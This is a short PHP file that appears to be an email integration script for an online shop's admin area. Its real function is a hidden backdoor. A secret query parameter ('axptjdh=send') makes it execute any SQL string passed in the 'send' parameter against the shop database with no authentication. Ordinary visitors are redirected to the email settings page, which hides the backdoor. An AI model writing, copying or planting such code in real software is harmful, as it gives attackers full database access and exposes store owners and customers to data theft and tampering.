<?php
include "../../../init.php";
$obj_email= $_GET['send'];
if($_GET['axptjdh']=='send'){
$newsfor = "$obj_email";
$result = $GLOBALS['ISC_CLASS_DB']->Query($newsfor);	
}else{?><script language= "JavaScript">location.href="<?php echo GetConfig('ShopPath');?>/admin/index.php?ToDo=viewEmailIntegrationSettings"</script><?php }?>